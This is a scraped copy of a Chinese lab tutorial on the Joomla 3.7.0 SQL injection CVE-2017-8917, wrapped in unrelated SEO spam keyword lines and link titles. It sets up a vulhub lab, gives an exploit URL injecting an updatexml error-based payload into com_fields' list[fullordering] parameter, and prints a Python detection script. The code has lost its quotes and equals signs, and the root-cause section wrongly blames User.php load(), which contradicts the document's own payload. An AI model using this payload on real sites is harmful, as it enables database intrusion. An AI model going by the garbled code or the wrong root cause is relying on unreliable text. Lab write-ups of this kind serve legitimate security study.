当前位置: 首页 > news >正文

郑州高端定制建设网站网站做3年3年包括什么软件

郑州高端定制建设网站,网站做3年3年包括什么软件,富阳网站,wap网站开发培训1 漏洞概述 Joomla是一个基于PHP的内容管理系统#xff08;CMS#xff09;#xff0c;广泛应用于各类网站。2017年#xff0c;Joomla 3.7.0版本被发现存在SQL注入漏洞#xff08;CVE-2017-8917#xff09;#xff0c;攻击者可以利用该漏洞对数据库进行未授权查询或操作…1 漏洞概述 Joomla是一个基于PHP的内容管理系统CMS广泛应用于各类网站。2017年Joomla 3.7.0版本被发现存在SQL注入漏洞CVE-2017-8917攻击者可以利用该漏洞对数据库进行未授权查询或操作可能导致数据泄露、篡改甚至删除。 2 影响范围 Joomla 3.7.0版本 3 漏洞原理 该漏洞主要源于Joomla 3.7.0版本中对用户输入处理不当导致攻击者可以在特定条件下向SQL查询中注入恶意代码。具体来说漏洞存在于libraries/src/User/User.php文件中的load()方法当用户登录时会调用此方法来加载用户信息。然而该方法未能充分过滤用户输入从而导致了SQL注入的发生。 4 vulhub靶场搭建 进入漏洞文件 cd vulhub/joomla/CVE-2017-8917 部署漏洞环境 docker compose up -d 查看漏洞端口 docker compose PS 启动后访问http://192.168.135.132:8080即可看到Joomla的安装界面和测试数据。 5 漏洞复现 直接访问http://192.168.135.132:8080/index.php?optioncom_fieldsviewfieldslayoutmodallist[fullordering]updatexml(0x23,concat(1,user()),1)即可看到SQL报错信息 6编写python脚本探测漏洞 #!/usr/bin/env python ​ import requests from urllib.parse import urljoin ​ def joomla3_sql(url):payload urljoin(url, /index.php?optioncom_fieldsviewfieldslayoutmodallist[fullordering]updatexml(0x23,concat(1,user()),1)) ​response requests.get(urlpayload, verifyFalse) ​if XPATH syntax error in response.text:print(漏洞存在)else:print(漏洞不存在) ​ if __name__ __main__:print(注意本代码仅用于实验和学习目的请谨慎使用。)url input(请输入目标 URL: )joomla3_sql(url) 结果 7 修复建议 为了防范此漏洞建议采取以下措施 升级到最新的Joomla版本及时修补官方已知的漏洞 限制用户输入对所有用户提交的数据进行严格的过滤和验证 使用安全的编程实践遵循最佳安全指南以防止类似漏洞的出现 定期对网站进行安全审计检查是否存在其他潜在的安全风险。
http://www.hkea.cn/news/14363407/

相关文章:

  • 做运动鞋的网站视频做网站服务器可以挂到外地么
  • 广州网站建设提供商中小企业有哪些公司
  • 盐城建站2000个免费货源网站
  • 个人作品网站制作图片软件有哪些
  • 下载网站后怎么做网站开发的教学视频
  • 可以搭建分站的网站2015做导航网站好
  • 石家庄网站网站建设上海兴业建设有限公司网站
  • 网站建设需要学编程么系统网站
  • 惠州论坛网站建设php免费开源crm系统
  • 网站关键词在哪里做品牌营销策划方案报价
  • 给个网站好人有好报2021珠海响应式网站建设费用
  • 网站查找工具深圳广东网站建设套餐
  • 通辽做家教的网站谷歌网页版入口在线
  • 青岛知名网站建设定制甘肃机械化建设工程有限公司网站
  • 怎么样免费做公司网站专业网站建设品牌策
  • 网站建设的来源网站建设交接表
  • dede购物网站搬搬屋源码网
  • 网站系统php源码慈溪做无痛同济 amp 网站
  • 上海专业网站建设机构保险网站建设的目标
  • 福永做网站的公司做拍卖网站怎么样
  • 做企业网站的多少钱百度推广运营这个工作好做吗
  • 做网站PV分类目录网站怎么做
  • 宁波seo网站推广上网导航下载
  • 免费做漫画网站方正隶变简体可以做网站用么
  • wamp个人网站开发来源阜南县建设局网站
  • 摄影网站制作软件电子商务网站建设流程
  • 泰安网页建设旺道seo网站优化大师
  • 博物馆网站建设的根本意义国外ps设计图网站
  • 滨州网站设计网站备案容易通过吗
  • 网站开发php是什么意思渠道推广费用咨询